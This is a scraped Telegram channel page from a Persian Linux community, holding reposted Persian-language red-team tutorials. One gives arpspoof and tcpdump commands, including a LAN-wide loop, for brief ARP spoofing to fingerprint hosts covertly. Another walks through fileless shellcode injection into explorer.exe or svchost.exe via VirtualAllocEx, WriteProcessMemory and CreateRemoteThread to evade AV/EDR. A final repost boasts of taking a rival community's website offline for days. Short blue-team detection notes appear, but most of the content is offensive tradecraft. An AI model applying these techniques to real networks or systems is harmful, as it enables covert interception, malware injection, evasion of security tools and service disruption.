Linuxfarci | لینوکس فارسی
Открыть в Telegram
انجمن لینوکس فارسی در کنار شماییم تا مسیر پیشرفت رو لذت بخش تر و آسان تر کنیم❤️ sappurt us ~ https://daramet.com/Linuxfarci WEBsite - Linuxfarci.ir - kopaei.ir Email - info@linuxfarci.ir Admin - @mtaal
Больше2 804
Подписчики
-824 часа
+77 дней
+19230 дней
Архив постов
Repost from Cynet | Cyber Security
مشکلی توی لود سایت اصلی تهران کامیونیتی هست؟
tcommunity.pro
⚡️ شبح شبکه – تکنیک Network Ghosting با ARP Mirage
🩸 دستهبندی: تاکتیک رد تیم / شناسایی پنهان (Covert Recon)
🎯 هدف: جمعآوری اثرانگشت شبکه (fingerprint) در LAN بدون اجرای اسکن یا poisoning طولانی.
──────────────────────────────
🧠 مفهوم اصلی
در عملیاتهای واقعی، مخفیکاری یعنی «یکی شدن با ضربآهنگ شبکه».
اسپوفهای سنتی ARP معمولاً با flood شبکه و هشدارهای IDS شناسایی میشن.
اما در تاکتیک Ghosting، تو فقط برای چند صدم ثانیه هویت یکی از سیستمهای واقعی رو بازتاب میدی، اطلاعات لازم رو میگیری و ناپدید میشی.
یعنی یه «میرایج» (Mirage) میسازی — یه تصویر کاذب زودگذر از خودت توی حافظهی سوئیچ.
──────────────────────────────
🧩 جریان حمله – «پنجرهی میرایج»
کل حمله در بازهای کمتر از یک ثانیه انجام میشه.
در این مدت کوتاه، بخشی از بستهها از مسیر تو عبور میکنن و رد دقیقِ ساختار شبکه رو منتقل میدن.
گام ۱ – استخراج نقشهی ARP
ip neigh show # یا arp -nآیپی هدف (Target) و آیپی گیتوی رو پیدا کن. گام ۲ – ایجاد میرایج ARP با arpspoof فقط یک پاسخ ARP جعلی بفرست که تو را به عنوان آن هدف معرفی کند:
sudo arpspoof -t 192.168.1.7 192.168.1.1 -r -1 & sleep 0.6 && kill $!🔹 -r -1 یعنی فقط یک بار تکرار کن. 🔹 sleep 0.6 عمر شبح رو مشخص میکنه (۶ دهم ثانیه). گام ۳ – شنود غیرفعال بلافاصله شروع کن به شنود فریمهای ARP و ICMP با tcpdump:
sudo tcpdump -i wlan0 -c 50 "arp or (icmp and src host 192.168.1.1)"در این مرحله، پاسخهایی که به شبح تو برگشت داده میشن رو ضبط کن. گام ۴ – تحلیل Fingerprint از همین چند پکت میتونی اطلاعات زیر رو بگیری: TTL → سیستم عامل احتمالی (Windows/Linux/iOS) Window Size → نوع پشتهی TCP/IP MAC Vendor → نوع سختافزار هدف Timing → وجود پراکسی یا فایروال میانی ────────────────────────────── ⚙️ چرا موثر و بیصدا است؟ حافظهی ARP سویچ آخرین MAC دیدهشده رو حدود ۳۰۰ میلیثانیه ذخیره میکنه. طی همین بازه، چند بسته از مسیر تو رد میشن. هیچ flood ایجاد نمیکنی و حجم بستهها از آستانهی هشدار پایینتر میمونه. بعد از اون، جدول ARP به حالت اصلی برمیگرده. ────────────────────────────── 🧠 راهکارهای دفاعی (دید آبی) برای شناسایی چنین رفتاری: مانیتور burst‑های ARP زیر ۱ ثانیه. همبست کردن ARP log با DNS TTL. تعریف signature در Zeek/Bro برای ARP single‑burst replies. ────────────────────────────── 🔧 مثال پیشرفته (اسکریپت سریالی) حملهی میرایج در محدودهی کامل LAN:
for i in {2..20}; do sudo arpspoof -t 192.168.1.$i 192.168.1.1 -r -1 & sleep 0.6 && kill $! doneبا log سازی همزمان، میتونی بدون هیچ اسکنی، نقشهی توپولوژی شبکه رو بسازی.
جابجایی در حافظه — Pivot بیفایل بین فرآیندها به سبک رد تیم
🧠 خلاصه :
این آموزش توضیح میده چطور یه رد تیم واقعی میتونه کُد مخرب خودش رو بدون نوشتن هیچ فایلی روی دیسک، از یه پروسس معمولی به یه پروسس سیستمی منتقل کنه (مثل explorer.exe یا svchost.exe).
به این تکنیک میگن Memory Pivoting یا تزریق حافظهای بین فرآیندها.
🔹 یعنی چی؟
یعنی حملهای که کاملاً در حافظه اتفاق میافته — بدون هیچ فایل، بدون سرویس جدید، و تقریباً بدون ردپا.
رد تیمها این کار رو برای:
دور زدن آنتیویروسها (AV / EDR)
پایداری بیصدا در سیستمهای هدف
ساخت payloadهای Fileless واقعی
استفاده میکنن.
📍بهصورت خلاصه:
این آموزش دربارهی «جابهجایی و اجرای کد در حافظهی پروسس دیگر» است — بدون نیاز به Dropper، بدون نوشتهشدن هیچ فایل؛ یعنی حرکت بیصدا بین فرآیندها.
فرض کن متاسپلویت یا Beacon اولیهات فقط یه Access محدود داره.
به جای بالا بردن دسترسی با فایل یا سرویس جدید، میتونی کُدت رو از حافظهی همین پروسس، به حافظهی یه پروسس سیستمی (مثل explorer.exe یا svchost.exe) منتقل کنی — بدون لمس دیسک، بدون نیاز به Dropper.
در رد تیم واقعی، این یعنی:
عبور از AV و EDRهایی که فقط روی File I/O لاگ میگیرن.
ادغام در Execution Path طبیعی سیستم.
حفظ حضور در حافظه برای مدت طولانی، با ردپای تقریباً صفر.
⚙️ مسیر فنی — Windows Low-Level Flow
Enumerate Processهدف انتخاب میکنی:
Get-Process | Where-Object { $_.ProcessName -eq "explorer" }Open Handle with Access Rightsدر سطح WinAPI:
HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);Allocate Memory Remotely
LPVOID mem = VirtualAllocEx(hProc, NULL, shellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);Write Shellcode to Memory
WriteProcessMemory(hProc, mem, shellcode, shellcodeSize, NULL);Create Remote Thread
CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)mem, NULL, 0, NULL);در این لحظه، کد تو تو حافظهی یه پروسس قانونی اجرا میشه؛ نه فایلی نوشته شده، نه سرویس جدیدی ثبت شده. نه Sysmon EventID 1 داره، نه Process Creation واقعی. فقط یه anomaly در ThreadTable. 🔬 دید Blue Team و EDR تیم دفاعی فقط وقتی این رو میبینه که: از ETW (Event Tracing for Windows) برای ردیابی RemoteThread استفاده کنه. یا از eBPF/Syscall interception در لایهی کرنل برای شناسایی الگوهای VirtualAllocEx و WriteProcessMemory. این دقیقاً همون جاست که رد تیم باید برای تست آمادگی دفاع عمل کنه. 🧠 نکتهی عملیاتی Memory Pivoting فقط یه تکنیک نفوذ نیست، یه فلسفهی زنده موندن در حافظهست. هدف حذف ردپا نیست، هدف بقاء در فضاهای بین لاگهاست — اون سکوتی که سیستم هنوز نفهمیده درونش داره حمله اجرا میشه. Norah : رد تیم خوب، کسیه که بتونه تو حافظه حرف بزنه بدون اینکه کسی صداش رو بشنوه.
Repost from N/a
https://check-host.net/check-report/3140172bk8e4
به دلیل بی ادبی هایی مکرر گنده گویی و آشولاش بازی چندین روزی وب سایتتونو از دسترس خارج کردم
fcommunity? No TCommunity Better
کمتر مستر ربات باید میدید
یه کمکی بهتون میکنم
جای فروش محصولات بقیه ۴ تا کلاس امنیت سایبری برید که اینطوری زیر حمله سایبری ۲ قلو نزایین
کارم تازه با شما انگلای اینترنتی مفت خور شروع شده
